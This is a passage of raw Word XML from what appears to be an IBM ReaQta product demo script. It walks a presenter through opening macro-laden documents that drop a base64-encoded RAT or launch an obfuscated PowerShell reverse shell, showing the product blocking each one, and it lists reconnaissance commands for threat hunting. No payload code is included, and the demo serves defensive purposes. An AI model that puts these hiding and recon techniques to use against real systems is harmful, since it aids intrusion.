    </w:p>
    <w:p w14:paraId="435F22D6" w14:textId="59F35801" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t xml:space="preserve">Open the macro via the Developer tab. Show how there </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> seem to be much code here. Looks like the script drops an executable to the disk – but where is the code for the executable? Explain the key parts of the macro, i.e. the naming of the executable </w:t>
      </w:r>
      <w:r w:rsidR="003F293F" w:rsidRPr="003F293F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;random </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F293F" w:rsidRPr="003F293F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F293F" w:rsidRPr="003F293F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> string&gt;.tmp.exe</w:t>
      </w:r>
      <w:r w:rsidR="003F293F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and the fact that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executed</w:t>
      </w:r>
      <w:r w:rsidR="003F293F">
        <w:t xml:space="preserve"> by the macro</w:t>
      </w:r>
      <w:r>
        <w:t>. Highlight that the encoded script is actually contained within the document's comments as base64</w:t>
      </w:r>
      <w:r w:rsidR="003F293F">
        <w:t xml:space="preserve"> encoded byte code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Copy and paste the comments code into a putty shell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>that's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already logged into kali. Save the file then run </w:t>
      </w:r>
      <w:r w:rsidRPr="0074380A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>base64 -d &gt; tmp.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidRPr="0074380A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>file tmp.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to show that the based64 encoded comments are actually a hidden and encoded RAT (Remote Access Trojan) Windows executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8546B" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105"/>
    <w:p w14:paraId="275B5D32" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t>Run the macro and see ReaQta preventing the execution of the windows malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77131636" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t>Go to ReaQta Hive and show how Word caught the macro trying to drop the executable. Note also the file name of '</w:t>
      </w:r>
      <w:r w:rsidRPr="0074380A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&lt;random string&gt;.tmp.exe</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324807A9" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105"/>
    <w:p w14:paraId="105AA38E" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRPr="001E7CB8" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc101267851"/>
      <w:r w:rsidRPr="001E7CB8">
        <w:t>Living off the land</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with Powershell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="00414B2B" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t>Open this file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79939168" w14:textId="15D6B0AE" w:rsidR="001355D0" w:rsidRDefault="001355D0" w:rsidP="00DD0105">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="001355D0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>owerShell_Macro_Payload_Attached_Unicorn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.docm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F3CD0" w14:textId="7AE7F7D3" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t>Open the macro via the Developer tab. Talk about how this is a highly obfuscated and encoded Powershell script to create a remote shell connection back to an attacker. Show the obfuscation (e.g. Powershell command</w:t>
      </w:r>
      <w:r w:rsidR="001355D0">
        <w:t xml:space="preserve"> at the bottom of the macro). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001355D0">
        <w:t>Also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001355D0">
        <w:t xml:space="preserve"> show that it's a base</w:t>
      </w:r>
      <w:r>
        <w:t>64 encoded script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A7D13" w14:textId="77777777" w:rsidR="003F293F" w:rsidRDefault="003F293F" w:rsidP="00DD0105"/>
    <w:p w14:paraId="1A9CB83A" w14:textId="51E714EC" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t>Run the macro and see ReaQta preventing the execution of the Powershell malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A76991" w14:textId="77777777" w:rsidR="003F293F" w:rsidRDefault="003F293F" w:rsidP="00DD0105"/>
    <w:p w14:paraId="0954598C" w14:textId="7C961605" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t xml:space="preserve">Go to ReaQta Hive and show the attack. Show the Powershell code that the malware actually tried to execute. Note that the obfuscation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has been removed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> but the malware itself is still base64 encoded. Mention that you can download the code </w:t>
      </w:r>
      <w:r w:rsidR="003F293F">
        <w:t xml:space="preserve">for analysis </w:t>
      </w:r>
      <w:r>
        <w:t>if desired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D7B122" w14:textId="5B39FF3D" w:rsidR="001355D0" w:rsidRDefault="001355D0" w:rsidP="00DD0105"/>
    <w:p w14:paraId="5B01AA37" w14:textId="50F19C21" w:rsidR="001355D0" w:rsidRDefault="001355D0" w:rsidP="00DD0105">
      <w:r>
        <w:t xml:space="preserve">Conclude by saying that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReaQta's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> agent can prevent highly obfuscated and encoded malware execution, as well as the prevention of executable drops, which </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on malware behavior, not signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D4FCF" w14:textId="12447BF6" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105"/>
    <w:p w14:paraId="68543760" w14:textId="77777777" w:rsidR="003F293F" w:rsidRPr="00DD0105" w:rsidRDefault="003F293F" w:rsidP="00DD0105"/>
    <w:p w14:paraId="3E9BC09B" w14:textId="3E0A87EF" w:rsidR="004C0ABE" w:rsidRPr="004C0ABE" w:rsidRDefault="00EF1786" w:rsidP="004C0ABE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc101267852"/>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stage 3 - R</w:t>
      </w:r>
      <w:r w:rsidR="00922E7D">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>ight of</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="004C0ABE">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="004C0ABE">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>oom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="08082D46" w14:textId="1DB0EAB7" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Uncover attacker footholds with ReaQta Threat Hunting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27292A33" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="7838C768" w14:textId="768FDC6D" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Explain that you can never be sure that a breach </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hasn't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> happened and that you've potentially got multiple bad actors living in your network, which is where Threat Hunting comes in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E27B58C" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="3546DD77" w14:textId="13023DB1" w:rsidR="004C0ABE" w:rsidRDefault="009C298F" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Go to the T</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">hreat </w:t>
      </w:r>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">unting screen and show you can easily find commands that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C0ABE">
        <w:t>have been run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00461B35">
        <w:t xml:space="preserve">that are </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">associated with </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t>phase of the kill chain. What commands might an attack use for reconnaissance? Here are some examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAADB4B"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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07ABCDE0" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRPr="00617259" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617259">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505C724"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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29B595D5"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sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3641D97B"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netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17411A01"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nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="378F556E" w14:textId="43818E69" w:rsidR="004C0ABE" w:rsidRDefault="00461B35" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Show </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> different </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE">
        <w:t xml:space="preserve">Search for a command line containing </w:t>
      </w:r>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="00617259">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="00617259">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C0ABE" w:rsidRPr="00617259">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CD383A" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="1B96C8C2" w14:textId="1ADB48CA" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Next, show how easy it is to search for events by category. Start typing </w:t>
      </w:r>
      <w:r w:rsidRPr="00617259">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>'cross'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to show how you can find events by 'Cross-process Operation'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A06976" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EFA8312" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRPr="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="001A6A55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc101267853"/>
      <w:r w:rsidRPr="004C0ABE">
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4B833404" w14:textId="781A2C4B" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">ReaQta enables customers to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>be protected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> before the boom by preventing the execution of malware, including ransomware. It enables defenders to stop attacks dead in their tracks. Lastly, it makes threat hunting easy to help uncover existing attacker footholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036F4C35" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="22A21E1A" w14:textId="61F552AC" w:rsidR="009C298F" w:rsidRDefault="009C298F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="IBM Plex Sans Light" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420922D8" w14:textId="7CCDA7A0" w:rsidR="00000ECD" w:rsidRDefault="00183787" w:rsidP="0077681B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663359" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24E551EF" wp14:editId="0C850FCD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2000250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5775325" cy="334327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75325" cy="3343275"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="6350">
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="22E4E642" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="426247C5" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4F682995" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>© Copyright IBM Corporation 20</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>22</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A100AE0" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>IBM Security</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>Route 100</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>Somers, NY 10589</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>U.S.A.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="047E13BD" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>Produced in the United States of America</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>February 20</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>22</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>All Rights Reserved</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="73C7DD66" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:rFonts w:cs="HelvNeueRomanforIBM"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>IBM, the IBM logo, ibm.com, and IBM X-Force are trademarks or registered trademarks of International Business Machines Corporation in the United States, other countries, or both. If these and other IBM trademarked terms are marked on their first occurrence in this information with a trademark symbol (</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:position w:val="-1"/>
                              </w:rPr>
                              <w:t>®</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t xml:space="preserve">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w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:rFonts w:cs="HelvNeueRomanforIBM"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>ibm.com/legal/copytrade.shtml</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5585848B" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>Other product, company or service names may be trademarks or service marks of others.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7E3AB750" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                            <w:pPr>
                              <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>References in this publication to IBM products or services do not</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B46757">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>imply that IBM intends to make them available in all countries in which IBM operates.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51EF" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:157.5pt;width:454.75pt;height:263.25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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="22E4E642" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="426247C5" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4F682995" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>© Copyright IBM Corporation 20</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>22</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A100AE0" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>IBM Security</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>Route 100</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>Somers, NY 10589</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>U.S.A.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="047E13BD" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>Produced in the United States of America</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>February 20</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>22</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>All Rights Reserved</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="73C7DD66" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:rFonts w:cs="HelvNeueRomanforIBM"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
